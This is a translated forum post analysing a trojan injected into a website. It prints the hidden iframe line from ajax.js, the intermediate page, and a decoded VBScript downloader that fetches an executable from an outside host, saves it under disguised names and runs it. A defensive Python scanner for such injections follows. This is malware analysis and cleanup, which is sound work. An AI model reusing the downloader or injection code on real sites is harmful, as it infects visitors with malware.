凝逸反毒 / 锐智论坛 (analysis and cleanup of the trojan planted on 锐智论坛): Scan Web Pages for Viruses
锐智论坛 10:47:02
Can you take a look at www.reizz.net? It has been hit with a trojan.
锐智论坛 10:47:49
Even the admin backend has it; just now I used ...
====== 凝逸反毒 Cleanup ========
Downloaded www.reizz.net with a tool.
Found nothing.
If I get infected, so be it (scary); opened www.reizz.net in IE.
"Temporary Internet Files": didn't see any exe appear, and no trojan showed up at startup either.
Could it be that it isn't infected?
But 锐智论坛 says it is.
Looked through all the js files and found the bad one: ajax.js
---------------------
document.writeln("<iframe SRc=http:\/\/web.47255.com\/www\/web.htm width=0 height=100><\/IfRaMe>");
---------------------
`\/` is not how this is normally written.
Downloaded http:\/\/web.47255.com\/www\/web.htm with a tool
--------------------- got ---------------------
<html><TITLE>MAO</TITLE><BODY>
<iframe src=r.htm width=0 height=0></iframe>
<iframe src=06014.html width=0 height=8></iframe>
<script src='http://s23.cnzz.com/stat.php?id=729857&web_id=729857' language='JavaScript' charset='gb2312'></script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1494619.js"></script>
</body></html>
---------------------
Even more likely now.
r.htm: can't decode it, skipping.
06014.html 10
------
<script>
t="...long comma-separated character-code list omitted here; its decoded form follows below..."
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>
-------------------
---- decoded ---------
<html>
<script language="VBScript">on error resume next
x1="ob"&"je"&"ct"
x2="cl"&"assi"&"d"
x3="cls"&"id:B"&"D96"&"C5"&"56-6"&"5A3-1"&"1D0-9"&"83A-"&"00C"&"04FC"&"29"&"E"&"36"
x4="M"&"i"&"cr"&"o"&"sof"&"t.X"&"M"&"L"&"HT"&"T"&"P"
x5="Shell.Application"
x6="Scri"&"pti"&"ng.Fil"&"eSys"&"tem"&"Obje"&"ct"
Set ec = document.createElement(x1)
e ="http://web.47255.com/www/www.exe"
ec.setAttribute x2, x3
ei=x4
Set ed = ec.CreateObject(ei,"")
s1="A"&"d"&"o"
s2="d"&"b"&"."
s3="St"&"r"
s4="ea"&"m"
ef=s1&s2&s3&s4
eg=ef
set ea = ec.createobject(eg,"")
ea.type = 1
eh="G"&"E"&"T"
ed.Open eh, e, False
ed.Send
e9="svchoost.exe"
set eb = ec.createobject(x6,"")
set ee = eb.GetSpecialFolder(2)
set mm = eb.GetSpecialFolder(0)
mma ="quit.exe"
ea.open
e8="ea.BuildPath(ea,e8)"
e7="eb.BuildPath(eb,e7)"
e6="ec.BuildPath(ed,e6)"
e5="ed.BuildPath(ef,e5)"
e4="ee.BuildPath(eg,e4)"
e3="ef.BuildPath(eh,e4)"
e2="eg.BuildPath(ei,e3)"
e1="eh.BuildPath(eg,e1)"
e0="ei.BuildPath(ek,e0)"
e9= eb.BuildPath(ee,e9)
mma= eb.BuildPath(mm,mma)
ea.write ed.responseBody
ea.savetofile e9,2
ea.savetofile mma,2
ea.close
set ee = ec.createobject(x5,"")
datas="101,101,46,83,104,101,108,108,69,120,101,99,117,116,101,32,101,57,44,34,34,44,34,34,44,34,111,34,38,34,112,34,38,34,10
1,34,38,34,110,34,44,48"
execute(ChrData(datas))
Function ChrData(Data)
MyArray = Split(Data, ",", -1, 1)
For each OldData in MyArray
Newdata=NewData&chr(OldData)
Next
ChrData=NewData
End function
</script></html>
-------------
-----------
e ="http://web.47255.com/www/www.exe"
------
Haha, little one, there you are.
Downloaded http://web.47255.com/www/www.exe; still live; got a trojan sample for free.
hoho
=============================
====== 凝逸反毒 Cleanup ========
Trojan located.
Download 凝逸反毒: http://ccc0.111n.com/
In 凝逸反毒, use "Scan Web Pages for Viruses" (扫描网页病毒).
Add it to "Scan Web Pages for Viruses" and it will clean the virus code out of the website:
-----------------
document.writeln("<iframe SRc=http:\/\/web.47255.com\/www\/web.htm width=0 height=100><\/IfRaMe>");
-----------------
Scan all web pages (*.htm, *.js) and it is cleaned.
(凝逸反毒 - Scan Web Pages for Viruses) demo: http://hi.baidu.com/503165656/bl ... 27310bd9f9fdc6.html
http://web.47255.com/www/www.exe
Add it to the 凝逸反毒 virus database; see below:
[凝逸反毒 - batch-adding virus samples yourself] oso.exe virus [analysis and cleanup method]
Demo: http://hi.baidu.com/503165656/bl ... 632f300a55a9b1.html
http://hiphotos.baidu.com/503165656/pic/item/b202ca24b7afee0e4c088d1c.jpg
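As an added defender-side example (not from the page, 凝逸反毒 or 锐智论坛), a small Python scanner that does what the decoding and cleanup steps above describe: it flags write()/writeln() calls that inject zero-size or `\/`-escaped iframes in *.htm/*.js files, decodes String.fromCharCode number lists and joins split VBScript literals so the hidden content can be reviewed, and strips the flagged lines. All function names are my own and the sample inputs are constructed, modelled on the injected ajax.js line and the charcode loader quoted above.

```python
import re
from pathlib import Path

# Constructed sample modelled on the injected ajax.js line quoted on this page (not the live file).
SAMPLE_JS = (
    'function ajax(u){ return u; }\n'
    'document.writeln("<iframe SRc=http:\\/\\/web.47255.com\\/www\\/web.htm width=0 height=100><\\/IfRaMe>");\n'
)
# Constructed sample of the charcode loader pattern; "60,104,116,109,108,62" is just "<html>".
SAMPLE_HTML = 'x="60,104,116,109,108,62"\nt=eval("String.fromCharCode("+x+")");\ndocument.write(t);'

IFRAME_RE = re.compile(r'document\.write(?:ln)?\(.*<iframe', re.I)
ZERO_SIZE_RE = re.compile(r'\b(?:width|height)\s*=\s*["\']?0\b', re.I)
CHARCODES_RE = re.compile(r'"((?:\d{1,3},\s*){3,}\d{1,3})"')   # String.fromCharCode number lists
VBS_JOIN_RE = re.compile(r'"\s*&\s*"')                            # "ob"&"je"&"ct" split literals

def find_hidden_iframes(text):
    """(line number, line) for write()/writeln() calls injecting a zero-size iframe or using '\\/' escapes."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        if IFRAME_RE.search(line) and (ZERO_SIZE_RE.search(line) or '\\/' in line):
            hits.append((n, line))
    return hits

def decode_charcodes(text):
    """Decode every quoted comma-separated decimal list to plaintext for analyst review."""
    return ["".join(chr(int(c)) for c in m.group(1).split(","))
            for m in CHARCODES_RE.finditer(text)]

def unsplit_vbs_strings(text):
    """Join split VBScript literals so ProgIDs and CLSIDs read normally."""
    return VBS_JOIN_RE.sub("", text)

def clean_injected(text):
    """Return text with the flagged injection lines removed (the page's cleanup step)."""
    bad = {n for n, _ in find_hidden_iframes(text)}
    kept = [l for n, l in enumerate(text.splitlines(), 1) if n not in bad]
    return "\n".join(kept) + ("\n" if text.endswith("\n") else "")

def scan_tree(root):
    """Walk *.htm/*.html/*.js under root, as the page's 'scan all web pages' step does."""
    report = {}
    for p in Path(root).rglob("*"):
        if p.suffix.lower() in (".htm", ".html", ".js"):
            txt = p.read_text(errors="replace")
            hits, decoded = find_hidden_iframes(txt), decode_charcodes(txt)
            if hits or decoded:
                report[str(p)] = (hits, decoded)
    return report
```

Run `scan_tree` over a copy of the site's files and review `decode_charcodes` output by hand before deleting anything; legitimate scripts can also build strings from char codes.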
=============================
========== 锐智论坛 still writes it up better; my writing ability is poor, 555 ===================
锐智论坛(775460031) 12:19:10
Heh, a trojan-catching diary
http://nyav.uu1001.com/read.php?tid=102&newpost=1
=============================